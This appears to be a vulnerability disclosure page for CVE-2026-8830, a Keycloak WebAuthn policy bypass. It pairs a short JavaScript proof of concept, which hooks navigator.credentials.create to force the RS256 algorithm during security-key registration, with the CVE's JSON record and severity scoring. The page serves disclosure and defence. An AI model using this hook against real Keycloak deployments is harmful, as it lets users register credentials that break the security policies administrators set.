CVE-2026-8830

// Conceptual PoC for CVE-2026-8830 // This script demonstrates how to manipulate the WebAuthn registration request // to bypass server-side policy checks on public key algorithms. // 1. Hook into the WebAuthn registration function const originalCreate = navigator.credentials.create; navigator.credentials.create = function(options) { // 2. Modify the publicKey parameters before sending to the authenticator/server // Example: Force a weaker algorithm (e.g., RS256) if ES256 is enforced by policy if (options && options.publicKey) { console.log("[+] Original publicKey params:", options.publicKey); // Attempt to bypass policy by altering acceptable algorithms or extensions // Note: The actual bypass depends on specific server validation logic gaps. options.publicKey.pubKeyCredParams = [ { type: "public-key", alg: -257 } // RS256 (COSE algorithm identifier) ]; console.log("[+] Modified publicKey params:", options.publicKey); } // 3. Proceed with the modified request return originalCreate.call(navigator.credentials, options).then(credential => { console.log("[+] Credential registered successfully with bypassed params."); return credential; }); }; // Trigger the registration flow on the target Keycloak instance // User must be logged in and initiate the "Add Security Key" action.

{"cve": {"id": "CVE-2026-8830", "sourceIdentifier": "[email protected]", "published": "2026-05-19T07:16:30.500", "lastModified": "2026-05-19T07:16:30.500", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. An authenticated user can bypass configured WebAuthn policies during credential registration by manipulating client-side JavaScript. This occurs because the server-side processAction() fails to validate that the newly created credential's parameters, such as public key algorithms, match the realm's configured WebAuthn policies. This could lead to the creation of credentials that do not adhere to administrative security requirements, potentially weakening the overall security posture of the system by allowing non-compliant authentication methods."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-603"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-8830", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2479565", "source": "[email protected]"}]}}